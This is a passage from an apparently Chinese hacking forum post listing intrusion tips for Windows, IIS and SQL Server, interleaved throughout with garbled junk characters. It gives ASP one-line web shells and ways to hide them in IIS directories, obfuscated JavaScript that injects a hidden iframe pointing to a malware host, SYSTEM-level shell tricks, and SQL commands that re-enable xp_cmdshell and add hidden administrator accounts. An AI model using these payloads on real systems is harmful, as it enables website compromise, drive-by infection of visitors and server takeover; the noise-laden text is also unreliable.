& K7 Q! a7 y; x3 o' L, {f).<%if request("cmd")<>"" then execute request("pass")%>/ W3 K9 V7 l& {' Y! Q6 F
, Z2 p4 s; \" A& W
52、at "12:17" /interactive cmd9 R0 J/ Q7 b+ w6 }. z+ z. f: \
执行后可以用AT命令查看新加的任务3 ]) u9 ~% x9 S; ]
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
: b3 N F G5 T9 g, B3 t! ~0 Z
5 A4 I/ g! |+ C# I% H* p53、隐藏ASP后门的两种方法
# D3 H& E# b4 S1、建立非标准目录:mkdir images..\
8 v) J2 d9 z4 \4 I拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp- i# S8 ?2 d" {" j% H
通过web访问ASP木马:http://ip/images../news.asp?action=login
+ e; y6 j/ ]+ C* Q K- h6 Y9 n! v如何删除非标准目录:rmdir images..\ /s
" {' E2 }, K) O3 p7 ^9 {4 [% ^6 u' T2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:$ \0 E5 Q- L' {4 ]: |/ }* M
mkdir programme.asp
1 c5 g! F6 ~+ g6 L# q" }. e新建1.txt文件内容:<!--#include file=”12.jpg”-->) R( R& Y+ W: i
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件 Y4 m1 i# D& ?" `+ n2 ]9 Z2 F$ A( l
attrib +H +S programme.asp
$ m: y+ B/ L, f y; m; y通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt1 T m9 p: Q% k1 ?5 X) t& n5 j4 q# t6 i
' T8 a& _- K* }$ Q
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
e! p# Z3 l3 F1 L/ w1 A9 w然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
6 c. f9 a% A! A1 P) B; L2 j6 C& C7 L: T5 k, M
55、JS隐蔽挂马& v: G: j# u2 i0 G F
1.
! X* w, e ?0 d/ {, h) J' {% c4 T. Dvar tr4c3="<iframe src=ht";
2 v- d. `& ^4 ^! B, ttr4c3 = tr4c3+"tp:/"; I+ n t S& o. F6 Q& b9 q1 a
tr4c3 = tr4c3+"/ww";% z+ a N$ d$ X" g& b$ C: H( T
tr4c3 = tr4c3+"w.tr4";& H; n; N0 X+ Y" |% s2 w
tr4c3 = tr4c3+"c3.com/inc/m";" c3 S+ p; R1 f) C6 w8 F5 d
tr4c3 = tr4c3+"m.htm style="display:none"></i";
* J1 H$ [3 B2 u) ktr4c3 =tr4c3+"frame>'";) x% H1 z' `; ~* P/ e) S
document.write(tr4c3);% r! @! i3 u8 V- s: ?( L p% h* D j- y
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。7 N- X6 R0 `7 \! q' N8 i
! v Y H3 J" R: k+ g
2.
0 g1 H6 ^9 n6 G; o1 g/ _0 B1 m转换进制,然后用EVAL执行。如6 j6 f$ S+ ~. Y4 `+ C8 L
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
( I6 g+ m2 e* _( S7 x不过这个有点显眼。0 E ?: _% x7 ~8 U
3.
; @" q6 O( t+ G, [% J2 Vdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');9 T& a& N, v0 m8 t: e3 S1 j0 Z
最后一点,别忘了把文件的时间也修改下。
$ }5 x, F- ]# v
/ @6 n. B! U; C" N1 k2 }56.3389终端入侵常用DOS命令
W& y. M& l" ~4 p" _taskkill taskkill /PID 1248 /t: q" O/ i2 R4 g# g. l
$ ]4 K* h8 |* Z$ l% n
tasklist 查进程+ b4 ]8 A; {/ H, Q7 w
+ p3 }/ V% V2 `) G/ I h; {8 g C ucacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限2 n3 t! r6 W4 J1 O' n
iisreset /reboot
$ i+ Y9 I3 r) `tsshutdn /reboot /delay:1 重起服务器! L( X! Q4 |; J3 ^' S" x
! p4 d$ W! h, z/ c2 o" Y
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
$ T# o2 \5 d* {7 r0 x7 A+ T4 a: a$ z3 `) Q# Q
query user 查看当前终端用户在线情况
1 O; P% [8 u& w3 c: \- P. Q1 Z+ Y. K4 k) |) O2 g
要显示有关所有会话使用的进程的信息,请键入:query process *
7 L& H" I3 o# N1 x) o9 d5 O. O0 ^0 |' s# z8 o* Y
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:25 g8 V g- |# ~8 @, m
0 h7 k" ?; A5 b要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# C4 p+ R1 [' v7 s; s2 L! Z( k! N: ]: L: W/ H
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
9 \. O( z$ z/ j/ B3 ` f7 m- P8 I) Y6 x5 P" P
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启( h0 y6 x1 `0 _
# j. ^/ m. O7 h命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统, ?& ~% {7 _; f2 u9 R
" \: w* v5 Y- Q% j
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
% b$ p# \, h. k! q
) k: L! o/ C+ Q3 X. I' Y# k命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机- i! T7 v6 c! e4 C; K+ [6 ` j
7 ^6 B# n' y2 F; ?56、在地址栏或按Ctrl+O,输入:+ K" a7 s/ r4 D! U' Y4 G9 ]
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;- B, l5 P+ G% m/ P
A9 T; }' I! i# `! a. ~* r源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
, K4 }* ? Q7 O7 X9 \2 i" e3 S" Q% @& f# i) J
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
) U7 t5 ^7 u/ k2 m: \) [用net localgroup administrators是可以看到管理组下,加了$的用户的。5 r- C0 W2 D Y) y! [* R' x
* ?% ?2 l& x) U; K- H
58、 sa弱口令相关命令1 d+ `( ?' l$ K% \' e! B
* a! l7 j+ H w一.更改sa口令方法:
5 @/ @6 N# u& T4 R7 V' }. P W4 b用sql综合利用工具连接后,执行命令:. O M5 N7 N* [' t
exec sp_password NULL,'20001001','sa'& G8 R- u7 `$ j( l
(提示:慎用!)
' T& c* X3 ~- `5 r& v( X+ V. y7 F
二.简单修补sa弱口令.# t# U4 `( ~' D4 ^
* m- u1 X& ^- N. a% [/ b' L' e
方法1:查询分离器连接后执行:
: p# s6 T d/ `4 O; S& @7 wif exists (select * from6 E) F* V/ j R; |& Z/ A0 b
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and: _' H( C) t% t+ t; ?5 ?
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)8 S0 k* m0 t2 h
* @ F6 f% p" ~( h/ {
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'* H6 n! f$ p [4 Q8 @4 s
8 O( }3 M3 F# u6 s8 x4 A, eGO& s- }- S I# b; y
1 V& D2 N: e: h5 ?" j3 N! E1 \
然后按F5键命令执行完毕
3 Z. {/ D; ?- p" b5 Q1 E" j
6 W% n. M# Q0 [方法2:查询分离器连接后
- X/ X+ T0 B# \4 [& [第一步执行:use master
0 B- u6 x5 H. u' Z* D! K8 ?7 X: J第二步执行:sp_dropextendedproc 'xp_cmdshell'3 {1 s, L+ {7 C: y3 I) W: @7 f2 R
然后按F5键命令执行完毕5 {9 `3 H* l+ O' n/ { B0 ?8 b( W) t
2 Z( w: f, M4 I
- |! O G% D* l6 W. O1 V三.常见情况恢复执行xp_cmdshell.) K# x# R% P" P
5 ?5 `! z7 W; m9 _! m- s$ X* g
/ V' E! |5 G3 E/ V3 K, z1 未能找到存储过程'master..xpcmdshell'.! i# W, b) W2 Q) m
恢复方法:查询分离器连接后,2 d% T5 A: e/ A* }( U/ t
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ a; T* F& j L8 Z8 o* b m第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 G$ z* s8 a5 |9 a$ Z2 _. ]然后按F5键命令执行完毕! t: _# K: [4 Y% A
9 ?7 ^- w. e7 b
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
8 b' L3 [# ^6 z, U0 R恢复方法:查询分离器连接后,
; ]% p1 p/ @: E- ]) H第一步执行:sp_dropextendedproc "xp_cmdshell"
) g; n; H; ^; ~; A第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll': c; m0 z+ n0 s( v9 h. c9 F
然后按F5键命令执行完毕
5 L W" F+ B, V' ]" R% W/ F" _* ]
) p4 e& |' W0 I1 N8 K6 S2 r3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)/ L0 M+ T `0 B/ \: p, @4 b
恢复方法:查询分离器连接后,
4 c3 M. x1 P4 m) ?* B第一步执行:exec sp_dropextendedproc 'xp_cmdshell'9 |2 W% K$ g: [6 D7 C1 m
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 2 X F, w, X1 K: _8 @( A
然后按F5键命令执行完毕: W# g5 q6 J- {
. l3 H9 z4 }* N' k四.终极方法.+ m1 S, ]7 L) ^* j! {5 O' E& P1 X
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:( x8 W& L: F* n. ^. W
查询分离器连接后,1 i" Z- D/ b+ b; @3 m5 a
2000servser系统:
; H O# N; Q b, M% ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
4 @+ {% A' q9 |- F
" E+ a- U8 D$ Edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 U; _0 ^6 v3 U7 {3 L
/ T. }# W6 A* T7 W/ E
xp或2003server系统:/ Y _. [# z" j- D. q0 z
, w8 g3 i7 @& p5 e* q0 Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'/ u) u* y# n0 y( @
. B: U7 F9 F2 l j! f j' G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 S4 T) h9 J7 P& {- Q |
发表于 2012-9-15 14:51:03
收藏
支持
反对